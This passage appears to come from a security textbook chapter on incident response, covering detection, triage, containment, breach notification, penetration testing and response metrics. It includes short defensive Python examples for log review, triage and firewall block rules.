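        if baseline.get(path) != current.get(path):
            findings.append(path)
    return findings


# First run: save the baseline. Later runs: compare a fresh snapshot to it.
baseline_file = Path("baseline.json")
if not baseline_file.exists():
    baseline_file.write_text(json.dumps(snapshot(WATCHED)))
else:
    for path in compare(json.loads(baseline_file.read_text()), snapshot(WATCHED)):
        print(f"ALERT: {path} differs from baseline")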

Fig. 13.2 Important logs to collect [8, 9, 26]:
• Security and configuration changes: changes to security configurations; changes to network device configurations; changes in privileges; changes to secured files (system code/data)
• Authentication failures: unauthorized accesses; unapproved accounts; lockouts and expired password accounts; unsuccessful login attempts; simple passwords or single-factor authentication
• Network irregularities and failures: unusual packets (IP, port, login); blocked packets; transfer of sensitive or unusual data; changes in traffic patterns; system crashes
• Log issues: deleted logs; overflowing log files; clearing of or changes to log configuration
• Normal events: logins and logoffs; access to sensitive data (e.g., medical, payment card); all actions by administrators
• Software application events: attacks (SQL injection, invalid input, DDOS, cross-site scripting); unapproved applications; others, as listed in the previous categories
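As one concrete example of reviewing the 'unsuccessful login attempts' category above, this Python sketch counts failures per source address and flags sources that exceed a threshold. The log format and threshold are assumptions made for illustration; in production, this kind of review would normally be performed by a SIEM.

# A minimal sketch of scanning authentication logs for repeated failures;
# the line format ("FAIL user=... src=...") and threshold are assumed.
from collections import Counter

THRESHOLD = 5  # alert when one source exceeds this many failures


def failed_login_sources(lines):
    """Count failures per source in lines like: 'FAIL user=bob src=10.0.0.7'."""
    counts = Counter()
    for line in lines:
        if line.startswith("FAIL"):
            fields = dict(f.split("=", 1) for f in line.split()[1:])
            counts[fields.get("src", "unknown")] += 1
    return counts


sample = [
    "FAIL user=bob src=10.0.0.7",
    "OK user=alice src=10.0.0.8",
] + ["FAIL user=root src=203.0.113.9"] * 6

for src, n in failed_login_sources(sample).items():
    if n >= THRESHOLD:
        print(f"ALERT: {n} failed logins from {src}")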


Slower but effective mechanisms include human (employee, customer, vendor) reports of unusual or suspicious activity. For this to be an effective means of incident detection, security awareness training should educate employees to recognize attack symptoms and tell them how to report an incident that they personally observe or hear about from customers or vendors. There also needs to be a way for people to submit incidents anonymously [5].
Symptoms that should be investigated by IT professionals include: a device (firewall, router or server) issues one or more serious alarms; an intrusion detection system recognizes an irregular pattern (e.g., unusually high traffic, inappropriate file transfer, changes in communications protocol use); or unexplained system crashes or connection terminations occur. Even if an IDS is not available, heavy usage through the firewall or at a server should be a concern. Finally, when reported network or computer activity does not match actual activity, a hidden rootkit can explain the discrepancy [7].
Events that employees should report include [10, 26]:
• Malware: includes ransomware, keyloggers, RAM scrapers, suspicious emails, or antivirus software reporting malware. "Simple" viruses may result in criminal escalation that includes backdoor entry, data copying, and additional attacks on other computers.
• Violations of policy: includes unauthorized access or changes to IT equipment, information, and services. This includes use of computers for gambling, pornography, illegal downloads, and inappropriate use of email, as well as industry- or organization-specific violations of policy.
• Data breach: includes unauthorized access to information, a stolen laptop or backup memory, or an employee mistake: an inadvertent data breach may occur via email or unprotected shared data files.
• Social engineering/fraud: includes suspicious transactions or attempts by callers, e-mailers, or visitors to obtain information or service fraudulently; and fraud-related complaints from customers or vendors.
• Denial of service: includes distributed denial of service attacks.
• Physical disruption: IT equipment may be threatened or accessed in inappropriate ways.
• Surveillance or espionage: includes stealing proprietary, government or trade secret information.
• Attack on software: A program reports an attack that does not qualify elsewhere.
• Unusual/suspicious event: an employee recognizes an inappropriate login, a system aborts without good cause, a server seems unusually slow (DoS?), files get deleted, or the website is defaced.
Detection tools and implementations cost money. Executive management must be convinced that this money is well spent. Hopefully, Table 13.1 and the statistics in the Risk chapter will help to inform management of the true costs of a data breach. In addition to detection tools, redundant configurations, including redundant computers or alternative routing, may carry part of the load following an incident, after infiltrated equipment is removed.


Table 13.2 documents methods of detection and procedural responses for various types of incidents. The social engineering and theft events include brief descriptions of how the incidents should be handled. The 'Intruder accesses internal network' event is more complex and cannot be fully described in the Procedural Response section. Should the network/server be brought off-line? The technician selected to handle the intrusion could depend on the type of alarm generated, and the priority of the event depends on the type of alarm. Therefore, the incident itself may be further divided into a number of incidents. Because this incident's Procedural Response is lengthy, its table entry simply refers to a procedure. Such an extended procedure is divided into sections by incident stage (Identification, Containment, Analysis, etc.); samples are shown in Tables 13.3 and 13.4.
Table 13.2 High-level planning for incident detection and handling (workbook exercise). In all cases a warning banner is displayed and an incident report is written.
• Intruder accesses internal network. Description: Unusual network traffic observed via NIDS or IDS, or a firewall, database or server log indicates a probable internal intrusion (may qualify as espionage). Detection: logs reviewed for unusual type or quantity of traffic; daily log evaluations; high-priority email alerts. Response: IT/security addresses the incident within 1 h to prepare an investigative plan; if confidential/proprietary servers are involved, follow breach protocol.
• Break-in, loss or theft. Description: A laptop, backup tape, or memory source with confidential information was lost or stolen. Detection: Security alarm set for off-hours, or an employee reports a missing device. Response: Email/call security immediately if the memory contains confidential information. Security initiates tracing of laptops via location software, writes an incident report, and evaluates whether a breach occurred. Management calls police in case of computer theft.
• Social engineering. Description: A suspicious social engineering attempt was recognized, OR information was divulged that was recognized after the fact as being inappropriate. Detection: Training of staff leads to reports from staff to IT security. Response: Report to management and security. Warn employees of the attempt as added training. Security evaluates whether a breach occurred and writes an incident report.
• DDOS. Description: Server or network approaches 85% or higher utilization. Detection: Security alarm set when the threshold is reached; investigate the rate of successful transactions; sniff network traffic to determine whether the traffic appears legal or not. Response: Reject offending source IP addresses at the firewall. Notify the internet service provider. After 2 h, contact a security company handling DDOS attacks.
• Trojan wireless LAN. Description: A new WLAN masquerades as us. Detection: Key confidential areas are inspected daily for WLAN availability. Response: Security or network administrator is notified immediately. Employees in the affected area are warned of an attack, first electronically, then with an office visit. The incident is acted upon within 2 h.
• Data breach. Description: Inappropriate access to proprietary or confidential information. Detection: Preventive: two-factor authentication; restricted hours, devices and locations for personnel. Detective: zero trust alarms when the volume of records accessed exceeds a threshold. Response: Investigate a zero trust volume alarm as first priority (within 15 min). Take memory and network images of affected devices. Close down the confidential/proprietary network to contain the incident. Notify the business of the disaster to initiate the BC plan. Complete forensic collection. Follow the compromised payment card incident handling response procedure (Table 13.3), if appropriate.
• Violation of policy. Description: Violation of organizational standards and rules: unauthorized access or changes to IT, information, or service. Detection: Host IPS detects unauthorized access; unusual logs or inappropriate access by IP/MAC address; excessive access to data. Response: Remove permissions; discuss with the employee's management.
• Malware. Description: Antivirus software reports malware, and whether it can be automatically cleaned; or an employee reports unusual behavior. Detection: Employee report of unusual behavior, or antivirus report. Response: If employee-reported, run a second antivirus to check status. Follow the detected malware incident handling response procedure (Table 13.4).
• Ransomware. Description: Criminals infiltrate and encrypt our servers, and ask for ransom to decrypt and not publish data. Detection: Monthly offline monitoring of recent backups to ensure data looks normal and stable. Response: Weekly full backups maintained off-site; documented procedure to save off, reload, and test backups.
• Surveillance/espionage. Description: An external party infiltrates the organization in order to steal proprietary information. Detection: Confirmed via the protocols above (Data Breach or Intruder Accesses Internal Network). Response: Follow the data breach protocol above.


In addition to having an incident response plan, each organization should have an incident response form. Fields that may be included in such a form include: date/time the incident was detected, date/time the incident occurred, contact info for the reporting person, the reported suspicious observation, the incident type, affected systems and applications, impacted accounts, any police report, and all incident details, summary, and observation snapshots as noted by the incident response team [7].
Table 13.3 Incident handling response procedure: compromised payment card (workbook exercise)
Incident type: Handling of compromised payment card data
Contact name and information: Computer technology services desk: 262-252-3344 (O)
Emergency triage procedure: Disconnect computer from internet/WLAN. Do not reconnect. Do not log in to the compromised machine(s) or change passwords on it/them.
Escalation conditions and steps:
• Inform management within 2 h; they contact the legal department
• Inform the acquiring bank within 24 h
• Provide MasterCard information within 24 h; the contact is [email protected]
• Provide Visa's incident report within 3 days to the regional risk center; find the contact at [email protected]
Containment, Analysis & Eradication Procedure (assumes independent investigation by capable staff; otherwise a PCI forensic investigator is called):
• Identify all compromised devices and systems (e.g., servers, terminals, databases, logs)
• Document all containment and remediation actions taken, including dates/times, names and actions
• Preserve all evidence, including images and logs from all compromised and non-compromised devices. Expect to provide this evidence to PCI forensic analysts, if/when necessary.
• Prepare an incident report: within 24 h to the bank and MasterCard; within 3 days to Visa, with the incident response form
Other notes (prevention techniques): MasterCard reference documentation: Mastercard account data compromise user guide [26]. Visa reference documentation: What to do if compromised [32]. Some secure practices are provided in other sections of this security plan; additional forensic detail is required.
Table 13.4 Incident handling response procedure: detected malware (workbook exercise)
Incident type: Malware detected by antivirus software
Contact name and information: Computer technology services desk: 262-252-3344 (O)
Emergency triage procedure: Disconnect computer from internet/WLAN. Do not reconnect. Allow antivirus to fix the problem, if possible. Report to IT first thing during the (next) business day.
Escalation conditions and steps: If the laptop contained confidential information, investigate the malware to determine whether an intruder obtained entry. Determine whether breach law applies.
Containment, Analysis and Eradication Procedure:
• Run two versions of antivirus software to determine status. Security investigates the problem through CVE analysis, as provided by antivirus reports.
• If confidential information was on the computer (even though encrypted), malware may have sent sensitive data across the internet; encryption was ineffective and breach law may apply. A forensic investigation is required.
• Clean the disk, then: Type A: return computer (A = malware not dangerous and user not admin). Type B: rebuild computer (B = malware was dangerous and/or user was admin).
• Passwords are changed for all users on the computer. Confirm security settings before returning the machine to its owner.
Other notes (prevention techniques): Antivirus should record the type of malware to the log system.
13.2.1.1 Bringing in the Law
There are advantages to calling in law enforcement [27]. One is that this is a necessary step in catching criminals: if criminals can hack and ransom one organization after another and no one reports them, then criminals are only encouraged. Secondly, it can be difficult to chase after national or international criminals and win a court case, and law enforcement has the connections, training, advanced forensic tools and legal abilities to analyze and preserve evidence in correct ways to assure admissibility in court. Finally, current attackers and other criminals are deterred from further attacking that organization.
For purposes of prosecuting crimes, it is important to clearly warn users at login who is allowed to log in to that system and for what purposes. This warning banner should also indicate that communications may be monitored, so there is no question of the organization's intention to monitor for cyberattacks [27].
Law enforcement recognizes that businesses cannot afford to shut down for an investigation and are sensitive to negative publicity. Therefore, to retain goodwill, there is a delicate balance between accessing evidence and resuming business [27]. It is a priority for law enforcement to copy images but not disrupt business by taking important business servers. Law enforcement and the organization should coordinate their public announcements, to minimize negative publicity for the business and minimize the release of damaging information relating to the investigation. If arrests are made, law enforcement should notify the organization of all court proceedings and dates. To enable trust, it is important for law enforcement to establish relationships before an incident, and to explain what would happen during an investigation. Law enforcement has a policy of recognizing that investigations on an organization's computers are best conducted with approval from senior management, in combination with their legal representation. System administration is knowledgeable, but cannot make decisions on business operations.


It is important for organizations to decide the specific conditions under which law enforcement is called. When law enforcement is called, it is best not to modify the configuration or stored data, for the integrity of the evidence. However, it is possible to contain the attack, by filtering out attack source IPs and isolating attacked computer systems, while documenting who did what and when, and (eventually) the financial impact, for cost recovery purposes [27]. As soon as criminal activity is suspected, it is important to contact law enforcement. It is never a good idea to attack back, because that only breaks hacking laws (potentially against other innocent organizations' computers). Law enforcement also recommends capturing the initial configuration in memory, as outlined in the Forensics chapter section on Authentic Volatile Information. When initiating an investigation, law enforcement will require the network architecture from system administration, including network topology, software with versions, and proprietary software. Important log information includes what is logged, where it is logged, and how full the current log files are.

13.2.2 Step 2: Identification Stage
Often the first indication of an intruder is that a file or logs are created, accessed or deleted, or accounts or permissions have been added, modified, or deleted [27]. Law enforcement suggests evaluating log information to determine: where the attack originated from, which servers the attackers accessed, and which other users were affected.
An incident has been reported and it is necessary to look into it. It could be a real problem or a false positive (i.e., it looks threatening but is ok). The questions that need to be answered during the Identification Stage are: What type of incident just occurred? What is the severity of the incident? Who should be called? The severity may increase if recovery is delayed. When an incident is suspected, the appropriate incident response person should be called immediately to determine whether the cause for concern is real or a false positive. This person and other incident response team members will need written permission in policy to access and monitor accounts. This elevated permission may be kept in secured storage for security incidents [7].
Time will be critical when an incident occurs, and many things can happen simultaneously. A DDOS attack can hide a more serious attack, such as a ransomware breach [31]. Triage is the function of naming and categorizing the incident, prioritizing it, and assigning the handling of the incident to an appropriate handler. In a hospital, triage is what they do at the emergency room front desk to stop the bleeding, write a preliminary report, prioritize patients, and schedule the right doctor (according to how quickly people are dying). Decisions to be made include: what must be handled right away, what can be efficiently addressed by a nurse, what can't be addressed, and what can wait? Triage for a network attack may be for the firewall to disconnect the problem connection(s) and notify the network administrator via a high-priority alarm that a certain type of attack is underway.


The IRT has a preconfigured jumpkit with all tools, including forensic software utilities, to investigate the incident. All communications about the incident should be off-net, using cell phones or external email accounts, to combat any listening attacker [7].
The full set of functions during this stage includes: Sort, Categorize, Correlate, Prioritize and Assign [4]. Sorting may be important when multiple events occur simultaneously as part of one or more incidents. Documenting a snapshot of the known status of all reported incident activity is important to properly identify and categorize the event. This documentation will also be important in the later Analysis stage and to establish a chain of custody for evidence. Categories for attacks may include: DoS, malicious code, unauthorized access, inappropriate usage, or a combination of components. Prioritization is important when there is limited time and staff. Higher priority should be allocated to services at higher classification levels for confidentiality, integrity, and/or availability [5], as defined in the Business Continuity and Information Security sections. However, once Containment is completed, priorities may change. Assignment of staff may consider who is free or on duty, and who is competent in this area.
Evidence must follow chain of custody law to be admissible in court [4]. If the incident may ever be prosecuted, chain of custody must start immediately and proceed through this and all subsequent stages. This includes documenting all actions, including when they were performed, preferably working with a witness, and avoiding modifying evidence. This is best tracked in joint or separate files [31]. Most technical people do not know what they can and cannot do in evidence handling. If prosecution is to remain an option, it is important to employ specially trained staff as soon as possible, such as calling an outside forensic expert and legal counsel, law enforcement, or your own security response team. In the case of a data breach, the advantage of hiring outside legal counsel is attorney-client privilege, but eventually you will need to notify customers, and in the U.S., possibly the Attorney General or a state authority [11]. In Europe, you may need to report the breach within 72 hours, as part of following the GDPR [25].
If law enforcement is called, the typical FBI response to a threat involves interviewing key personnel, isolating compromised systems, performing live response, creating forensic images, and copying related logs and relevant evidence. They will leave your equipment intact as much as possible. They need to be notified as soon as possible, and are willing to deal with some false alarms [12].
Regardless of whether your organization decides to hire consultants, bring in law enforcement, and/or do much of the forensic work yourself, evidence collection is very tricky work. It is further described in the Forensics chapter. However, it is also important to react quickly to minimize damage. Even when law enforcement will be called, system administrators can retrieve information to identify an incident, determine the scope and size of the impacted environment (system/network), establish the degree of loss or damage, and uncover the possible path of attack [4]. While it is important to clearly identify the incident, it can be a good idea to begin to contain the incident even before it is fully identified.
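A minimal Python sketch of the triage functions (categorize, prioritize, assign) is shown below, assuming priority follows the affected asset's classification level. The category names, classification labels and duty roster are illustrative assumptions, not a standard.

# A minimal sketch of triage: sort by priority, assign a handler.
from dataclasses import dataclass

PRIORITY = {"confidential": 1, "internal": 2, "public": 3}  # 1 = most urgent
ON_DUTY = {"malicious code": "analyst-A", "unauthorized access": "analyst-B"}


@dataclass
class Incident:
    summary: str
    category: str        # e.g., DoS, malicious code, unauthorized access
    asset_class: str     # classification of the affected service


def triage(incidents):
    """Order incidents by asset classification, assign an on-duty handler."""
    ordered = sorted(incidents, key=lambda i: PRIORITY[i.asset_class])
    return [(i, ON_DUTY.get(i.category, "duty manager")) for i in ordered]


queue = [
    Incident("defaced web page", "unauthorized access", "public"),
    Incident("RAM scraper on POS", "malicious code", "confidential"),
]
for incident, handler in triage(queue):
    print(f"{handler}: {incident.summary}")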


13.2.3 Step 3: Containment and Escalation Stage
In this stage, the Incident Response Team is tasked with containing the threat. During Containment, the problem is isolated so the attacker becomes confined and controlled. Containment options may include [7, 10, 26]:
• Image affected devices: To avoid actions that could destroy information useful in a forensic analysis, copy volatile memory from all affected devices before changing the network configuration. (MasterCard recommends that their PCI Forensic Investigators do this step first.)
• Halting connections: Disconnect the attacker by reconfiguring firewalls or routers to not service particular IP addresses or port numbers (see the sketch at the end of this section). This is a temporary fix, since most attackers can easily change their IP address. The Internet Service Provider may be able to help in filtering an attack pattern.
• Disabling server communications or a network zone: Disconnect the computer or server from the network by effectively removing or disabling the Network Interface Card (NIC) of the infiltrated machine. It is also possible to break access to a zone or router region, by disconnecting network connections or powering down routers. Alternatively, safely power down a server or virtual machine.
• Disabling user access: Revoke privileges of internal users who violate policy; change passwords; enable two-factor authentication; prohibit an executable. Management actions may include scolding, additional training or termination.
• Alert related entities: Organizations whose data or systems may be affected, including financial or payment card companies and the internet service provider, can help to contain the attack.
• Continue to monitor: Closely monitor any continued progress of the attack.
• Patch vulnerable software: After obtaining images of all affected machines, it may be useful to patch vulnerable software, if vulnerabilities have been detected.
It is never appropriate to attack the attacker. This usually violates law and can escalate the confrontation.
Technical staff will need to collect system data and analyze this data and log files. They may require additional technical assistance from other staff. To further contain the incident, they may deploy patches and workarounds. The attack itself, or a disabled service, may affect other parts of the business. Management will need to be notified of the attack and any implications, such as temporarily unavailable services. Finally, if the incident is ever to go to court, the forensic staff must continue to obtain and preserve evidence according to strict legal rules.
Escalation is required for certain attacks, such as data breaches. During escalation, authorities are notified, such as the incident management team, executive management, board of directors, and possibly law enforcement [6]. Legal counsel should advise on issues related to investigation, prosecution, liability, privacy, regulation and nondisclosure. Forensic experts may be hired to investigate a breach.
An incident is likely to be chaotic [31]. At its worst, C-level management may swoop in and interfere by micromanaging. They must be trained in how to react during such an event. It may be wise to have a public relations person on retainer for when such events occur.
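To illustrate the 'halting connections' option referenced above, the following Python sketch emits standard iptables DROP rules for a list of offending addresses, for an administrator to review before applying. The addresses are examples only, and whether this containment step is appropriate depends on the incident and the IRP.

# A minimal sketch: generate (but do not execute) firewall block rules.
OFFENDING_IPS = ["203.0.113.9", "198.51.100.23"]  # example addresses


def block_commands(ips):
    """One DROP rule per offending source address."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]


for cmd in block_commands(OFFENDING_IPS):
    # Review, then apply; attackers can change IPs, so this is temporary.
    print(cmd)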


13.2.4 Step 4: Analysis and Eradication Stage
The intruder found some way to initially gain entrance into the network, and could do it again if this entry is not repaired. In addition, they most likely installed new backdoors into infiltrated systems. Therefore, the main function of the Analysis stage is to determine the root cause of the incident. This means analyzing the vulnerabilities that enabled the attack and why those vulnerabilities existed. To determine the root cause, it is important to start to understand what damage occurred and why. Computer Emergency Response Team (CERT) centers gather basic statistics per incident, including [3]:
• Actors: Who perpetrated the incident?
• Assets: Which assets (equipment, data) were affected?
• Actions: What happened during this incident?
• Attributes: How were the assets affected?

An extended set of questions asks about the initial attack: How did the initial attack happen? What vulnerability enabled the original attack? When did this initial attack occur? Where did the attack originate from? Also important is what happened during the attack: Who was affected? What was the motivation for the attack? The initial attacker entry may be via a program or configuration error, an opened phish, or another vulnerability.
To acquire root cause information, it is important to find the indicators (or symptoms of abnormal behavior) for the incident. Methods of analysis include using forensic tools, as discussed later in the Forensics chapter. Logs will need to be analyzed from different devices: operating system logs should indicate which accounts were accessed and when, and network devices may indicate any unusual ports. Internet Service Providers can assist by providing their logs regarding your network connection(s). The company whose software was attacked may be able to answer questions about error messages and codes, and provide help based on their experience. Comparing baselines between a known good and an attacked computer can pinpoint changes, by comparing expected files, file sizes, and file hashes for important files, and/or the set of active processes and connections at power-up. A forensic expert team (usually a private agency, but possibly law enforcement) can help to determine the scope of the attack and the set of probable victims.
Computer Emergency Response Team (CERT) centers monitor incidents and are good sources of information on common and emergent threats. By working with these centers, your organization helps not only yourself but other organizations who encounter similar threats [5]. Agencies include, for the U.S., www.cert.org and www.us-cert.gov, and for Europe, www.enisa.europa.eu/activities/cert. Organizations subject to FISMA must report incidents to US-CERT.
Once it is clear what happened, it is possible to remove the root cause. This will include rebuilding affected systems, updating the systems with recent patches and antivirus software, and fortifying defenses with enhanced security controls. Employees who were or may have been impacted should change their passwords on all their accounts. Finally, the rebuilt systems should be retested using vulnerability analysis tools.


Tables 13.3 and 13.4 show incident response procedures to handle payment card incidents and malware detected by antivirus software. Some malware may simply install a backdoor, enabling the hacker to enter at will. Antivirus software may be smart enough to remove the backdoor. However, it certainly cannot predict what the attacker installed in the window of opportunity between the installation of the backdoor and the detection of the malware by antivirus software. Therefore, it is important to understand the severity of the malware infection, although it is better to err on the side of rebuilding. It is also important to understand whether the computer held protected confidential data, to determine whether breach law may apply: even if the disk was encrypted, the operating system probably decrypted the data for the malware.

13.2.5 Step 5: Notification and Ex-Post Response Stages (If Necessary)
If a data breach of privacy has occurred, victims will need to be notified in an 'expedient' way [13]. In the U.S., according to breach notification laws, protected information (or PII) includes, for most states: social security number, driver's license number, state identification card number, financial account number or credit or debit card number, or a financial number combined with any security/access code or password. Some states or HIPAA/HITECH regulation also protect medical or health insurance information, genetic information, birth date/place, and some login/password combinations. Financial information is also protected by the Gramm-Leach-Bliley Act [7]. Organizations adhering to FISMA must report incidents to US-CERT and keep data for 3 years [5]. It is required or recommended to report any breach to the state's Attorney General, who may issue a lawsuit against any organization that does not notify in a timely manner [11].
There are many financial issues related to breaches, beyond the state government. Breach of contract civil suits may apply. In the U.S., the Federal Trade Commission (FTC) has brought civil suits against companies that did not provide sufficient privacy/security for their customers, resulting in an avoidable breach. Such a lawsuit generally argues that you advertised a privacy policy for your customers, which you did not follow through on [11]. In addition, class action lawsuits may be brought, to compensate customers and/or shareholders (e.g., for disclosures not fully reported).
For a data breach, a contact database of probable victims must be created. Notification may be delayed by law enforcement if an investigation is in progress. Using a consultant with experience in data breaches often saves companies money [6]. Working with a legal advisor can ensure that the law is fully met in developing and sending the breach notification letters to victims and regulators. Adopting a good public relations plan can also help to minimize customer churn, a major cost after a data breach. This often requires specialized training for remediation and call centers [3].


Following the Notification stage, the Ex-Post Response stage is concerned with redress or reparation [6]. Activities may include: implementing a call center, reissuing new (e.g., financial) accounts, offering discounts, and paying for identity protection services and/or credit report monitoring [6]. Because of increased customer churn, organizations often take actions to repair their image and acquire new customers.

13.2.6 Step 6: Recovery and Lessons Learned Stages
During the Recovery Stage, the organization restores operations to normal. The restored system should be fully tested before resuming operation. Once all is returned to normal, it is smart to learn from mistakes as part of the Lessons Learned stage. This stage should occur for major incidents, and perhaps quarterly or at least annually for minor events. What worked or caused problems during the incident response? Should the organization invest in additional detection or forensic analysis tools or training? Procedures can be corrected and expanded as part of process improvement. Security personnel should prepare a full Incident Report, which should include lost hours and incident costs, including the costs of loss and handling. The report should be distributed to stakeholders. Companies who have encountered data breaches consistently report implementing the following preventive controls (with perfect hindsight): endpoint security software, improved identity/access control and/or security intelligence, training for security awareness, expanded use of encryption, improved security documentation and controls, added tools for data loss prevention, etc. [2].

13.3 Preparing for Incident Response
The most common reason for failure in incident response is lack of management support. Hopefully, with the easy method provided by this book, this will not be your problem. Let's assume your IRP is written and approved by management. Congrats! However, there are still some things to do to prepare for an incident, including training, testing, revising the IRP, and (periodic) audit. There should be introductory training at or before the first day of IRT/IMT membership. Other forms of training may include mentoring by a senior member, formal training, and on-the-job training. Re-training is important when the IRP changes.
A penetration test is where a (friendly) certified ethical hacker (CEH) is hired to attempt to penetrate a system and/or network through hacking, social engineering, and/or physical attacks. They will evaluate firewalls, servers, wireless and web technologies for common high-tech vulnerabilities; use phishing, tailgating, and social engineering phone calls (etc.) for low-tech vulnerabilities [14]; and then use street smarts the same way a criminal would to see what else might work.


vulnerabilities through a friendly cracker is a lot cheaper than through a criminal stealing confidential data (and paying subsequent costs to forensic experts). The main difference between a ethical hacker ‘pen’ test and a criminal attack is written permission – and of course, consequences. Here are some different types of penetration tests [15]: • External Testing: Penetration tester tests from outside network perimeter. • Internal Testing: Tester tests from inside the network. • Blind Testing: Penetration tester knows nothing in advance and must do web/ news research on company. • Double Blind Testing: System/security administrators are not aware of the penetration test, in addition to the penetration tester having no previous knowledge. This test is useful for determining how effecting internal security is at recognizing and handling attacks. • Targeted Testing: Penetration tester has internal information about a target, and may have access to a user account. A penetration test is a wonderful method of audit. PCI DSS requires a qualified tester to perform an external and internal penetration test annually, as well as an incident response test to determine how the organization would respond to a serious attack [9]. Other ways to audit incident response is to ensure that the IRP is complete, approved and updated annually, that IRT/IMT members are comfortable and knowledgeable about their roles and responsibilities, and that incident response testing has been recently performed. For larger organizations, metrics help to evaluate incident response and the security organization’s effectiveness. Some recommended metrics include [4]: • • • • • • • •

• Number of reported incidents (via human or external reports)
• Number of detected incidents (via IT/security tools)
• Average time to respond to an incident (attain Containment Stage)
• Average time to resolve an incident (attain Recovery Stage)
• Total number of incidents successfully resolved
• Proactive and preventative measures taken
• Total damage (costs) from reported or detected incidents
• Total damage if incidents had not been contained in a timely manner
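As a minimal illustration, several of these metrics can be computed automatically from an incident-tracking log. The sketch below assumes hypothetical record fields (reported, contained, recovered, resolved, cost); in practice these would map to your ticketing system’s schema.

```python
from datetime import datetime
from statistics import mean

# Hypothetical incident records; field names are illustrative only.
incidents = [
    {"reported": datetime(2024, 3, 1, 9), "contained": datetime(2024, 3, 1, 13),
     "recovered": datetime(2024, 3, 2, 9), "resolved": True, "cost": 12_000.0},
    {"reported": datetime(2024, 4, 10, 8), "contained": datetime(2024, 4, 10, 10),
     "recovered": datetime(2024, 4, 10, 18), "resolved": True, "cost": 3_500.0},
]

def hours(start: datetime, end: datetime) -> float:
    """Elapsed time between two events, in hours."""
    return (end - start).total_seconds() / 3600

# Average time to respond (reach the Containment Stage) and to resolve
# (reach the Recovery Stage), plus simple totals for the Incident Report.
avg_respond = mean(hours(i["reported"], i["contained"]) for i in incidents)
avg_resolve = mean(hours(i["reported"], i["recovered"]) for i in incidents)
resolved_count = sum(1 for i in incidents if i["resolved"])
total_damage = sum(i["cost"] for i in incidents)

print(f"Average time to respond: {avg_respond:.1f} h")
print(f"Average time to resolve: {avg_resolve:.1f} h")
print(f"Incidents successfully resolved: {resolved_count}")
print(f"Total damage: ${total_damage:,.2f}")
```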

13.4 Questions and Problems

1. Vocabulary. Match each meaning with the vocabulary: Allowlist, Triage, Blind test, Root cause, Endpoint security suite, Vulnerability test, Incident mgmt team, Penetration test, Event or log management, Incident response plan, Incident response team, Chain of custody.


(a) A security tool for user computers, which features firewall, antivirus, and security configuration checking features.
(b) A friendly ethical hacker is paid to find vulnerabilities.
(c) A test to ensure that networked equipment can withstand common attacks.
(d) A tool or process for analyzing computerized alarms or notifications.
(e) A team of technical persons who will handle the incident, in combination with designated business management, public relations, legal, and physical security persons.
(f) A list of approved applications.
(g) A penetration tester is given no insider knowledge or credentials before their attack.
(h) The legal process of protecting evidence, by documenting all actions, working with a witness, and not altering the evidence.
(i) The stage of naming and categorizing the incident, prioritizing it, and assigning the handling of the incident to an appropriate handler.
(j) The plan that guides IT and security on how to handle security incidents.
(k) The vulnerability that enabled the attacker to enter the system.

2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook Incident Response Chapter to complete the tables.
(a) Create one ‘High-level Planning for Incident Detection and Handling’ table, similar to Table 13.2, listing five incident types.
(b) Create two ‘Incident Handling Response Procedure’ tables, similar to Table 13.3 or Table 13.4.
(c) If you refer to a procedure in (b), write a paragraph describing what steps should be taken, instead of writing a full procedure.

3. Vulnerability Root Cause. A forensic team is hired to analyze a suspected infiltration. The team finds that an employee scanned computers on the local network until she found a Point of Sale (PoS) device. She found that the password to the PoS was the default password, and installed spyware to record credit card numbers. The spyware caused a sudden increase in traffic sent over the Internet, and the resulting slowdown made management suspicious. They called in an IT specialist to investigate. The IT specialist saw unrecognizable packets coming from the PoS, and recommended the forensic team.
(a) What is the root cause(s) of the vulnerability?
(b) What mitigation strategies should be used to fix the vulnerabilities?

4. Incident Response Tool Evaluation. Select an incident response tool to evaluate. What capabilities does this tool have? What devices or operating systems does it analyze? How much does it cost? Can it be used legally? Write a description of this tool.


5. Investigate CERT Web Sites. What information is available at a CERT website? Look at the links and documents that are available at the site and write a description of what information is provided, including how you think the information could be used. Here are some sample sites:
(a) U.S.: www.cert.org and www.us-cert.gov
(b) Europe: www.enisa.europa.eu/activities/cert
(c) International: www.sans.org

6. Recent Incident Reports. This textbook refers to security reports from the year the book was written. Some statistics have certainly changed by the time you read this. What are some of the most recent statistics, according to Ponemon, Verizon, NIST, or Symantec reports? Search for a recent breach report or security report and document 15 updated statistics from that report.

7. Recent Regulation. Look up recent news reports on laws from any nation at www.huntonprivacyblog.com. Your instructor may provide additional resources. What recent legal issues did you find?

13.4.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study | Health First case study | Other resources
Planning for incident response | ✓ | Security Workbook

References

1. Perlroth N (2020) This is how they tell me the world ends. Bloomsbury Publishing, New York
2. Ponemon Institute (2014) 2014 cost of data breach study: United States. Ponemon Institute LLC, Traverse City, May
3. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
4. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights
5. Cichonski P, Millar T, Grance T, Scarfone K (2012) NIST special publication 800-61 rev 2: computer security incident handling guide. National Institute of Standards and Technology, Gaithersburg, August
6. Ponemon (2013) Cost of data breach study: United States. Ponemon Institute LLC, Traverse City, pp 1–22, May
7. Murdoch D (2014) Blue team handbook: incident response edition, v 2.0. www.vmit.com
8. SANS (2013) Critical controls for effective cyber defense, version 4.1, March. www.sans.org


9. Payment Card Industry (2013) Requirements and security assessment procedures, ver 3.0, November. www.pcisecuritystandards.org
10. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, Burlington, pp 392–418
11. Thompson L (2013) Privacy: the tidal waves of the future. In: ISACA chapter meeting. ISACA, Rosemont, 13 December
12. Brelsford E (2013) 2014: a cyber odyssey. In: ISACA Chicago chapter meeting. ISACA, Rosemont, 13 December
13. National Conference of State Legislatures (2014) Security breach notification laws. http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx. Accessed 20 Aug 2014
14. Walker M (2012) All-in-one CEH™ certified ethical hacker exam guide. McGraw-Hill, New York
15. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 379–381
